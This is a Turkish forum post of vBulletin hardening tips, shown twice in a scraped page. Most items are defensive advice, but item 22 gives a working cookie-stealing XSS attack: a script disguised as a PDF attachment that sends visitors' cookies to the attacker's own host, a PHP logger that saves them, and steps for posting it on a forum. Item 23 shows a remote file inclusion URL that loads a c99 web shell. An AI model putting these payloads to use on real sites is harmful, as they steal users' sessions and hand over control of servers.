vBuLLetin GüvenLik AçıkLarı ve Kapama YoLLarı

**PoLoNia** · 20-06-2008, 16:31

1- İLk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir.
2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.
3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz.
4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.
5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.
6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.
7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin
8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin
9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin.
10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.
11- Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek lamerlik yapabilir.
12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.
13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir.
14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.
15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın.
16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.
17-Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s
18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.
19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iyen kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası.
20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir [Sadece kayıtlı üyeler linkleri görebilirler. ] örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın
21-Eğer toplistinizi eklenti olarak kullanıyosanız ör:[Sadece kayıtlı üyeler linkleri görebilirler. ] html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
22- Gelelim eklentiden doğan xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.

Code:

<script>
d o c u m e n t.write(’<img src= "http://host adresiniz/cc= +"> ********.********.href= "https://www.google.com/adsense/testmagic.pdf";
</script>
Aşağıdakini de c.php olarak kaydedip bir host a atın.

Code:

<?php
$cookie = $_GET[’c’];
$ip = getenv (’REMOTE_ADDR’);
$date=date("m/d/Y g:i:s a");
$referer= getenv (’HTTP_REFERER’);
$fl = fopen(’megalog.txt’, ’a’);
fwrite($fl, "\\n".$ip.’ :: ’.$date."\\n".$referer."\\n".$cookie."\\n");
fclose($fl);
?>
Nasıl kullanılacağına geçelim :

vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.

Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.

işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz.

23-Diğer vbulletin toplist açığıda şöyle [Sadece kayıtlı üyeler linkleri görebilirler. ][url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.*/sh3L/c99.jpg?
bu şekilde biri sitenize fso ile uzaktan bağlantı kurabilir bunun için join.php deki FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path] kodunu silmeniz gerekmektedir.

20-06-2008, 16:31	#1 (permalink)
PoLoNia II.Nesil Üye Durum:Offline Üyelik Tarihi: Aug 2006 Nerden: Gökyüzünde Bir Yerde Mesajlar: 2.380 Takım: FENERBAHCE KanGrubu: B rH+ Eğitim: ..ÖSS.. Burcunuz: Akrep Arkadaşları:6 Ettiği Teşekkür: 28 Aldığı Teşekkür 127 Xsir Gücü: 0 Xsir Puanı: 1 Xsir Grafiği:	vBuLLetin GüvenLik AçıkLarı ve Kapama YoLLarı 1- İLk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir. 2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir. 3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz. 4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın. 5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin. 6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri. 7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin 8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin 9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin. 10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız. 11- Calender(Takvim) i silin biri oraya Hacked by **** gibisinden bişeyler ekliyerek lamerlik yapabilir. 12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar. 13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir. 14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir. 15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın. 16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın. 17-Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s 18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin. 19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iyen kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası. 20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir [Sadece kayıtlı üyeler linkleri görebilirler. ] örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın 21-Eğer toplistinizi eklenti olarak kullanıyosanız ör:[Sadece kayıtlı üyeler linkleri görebilirler. ] html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir. 22- Gelelim eklentiden doğan xss açığına Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin. Code: <script> d o c u m e n t.write(’<img src= "http://host adresiniz/cc= +"> ****.****.href= "https://www.google.com/adsense/testmagic.pdf"; </script> Aşağıdakini de c.php olarak kaydedip bir host a atın. Code: <?php $cookie = $_GET[’c’]; $ip = getenv (’REMOTE_ADDR’); $date=date("m/d/Y g:i:s a"); $referer= getenv (’HTTP_REFERER’); $fl = fopen(’megalog.txt’, ’a’); fwrite($fl, "\\n".$ip.’ :: ’.$date."\\n".$referer."\\n".$cookie."\\n"); fclose($fl); ?> Nasıl kullanılacağına geçelim : vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek. Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir. işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz. 23-Diğer vbulletin toplist açığıda şöyle [Sadece kayıtlı üyeler linkleri görebilirler. ]*[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www./sh3L/c99.jpg? bu şekilde biri sitenize fso ile uzaktan bağlantı kurabilir bunun için join.php deki FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path] kodunu silmeniz gerekmektedir. __________________ Yokum Özel Kişilere Tek Cevap Veririm

Konu Seçenekleri
Yazıcıdaki Görüntüsünü Göster Sayfayı E-Mail'le gönder
Modları Göster
Normal Mod Ağaç Modununa Geç Otomatik Konu Moduna Geç

Okuduğunuz Konuya Benzer Konular
Konu	Konuyu Açan	Forum	Cevaplar	Son Mesaj
ForumThemes	kabus0920	Vbulletin Stilleri	3	20-11-2008 02:30
Türkiye Cumhuriyeti 1961 Anayasası	cyBER_HaYLaZ	Hukuk	2	03-07-2008 21:45
Kırmızı Kitap (Milli Güvenlik Siyaset Belgesi)(Top secret)!!!	@CAPTAIN@	Gündem	1	22-03-2008 21:16
Güvenlik Açıkları	Rss Bot	Internet Haberleri	0	11-03-2008 19:00
Temel Güvenlik Yanılgıları	Trance-Apache	Bilgisayar Güvenliği	0	01-03-2008 20:33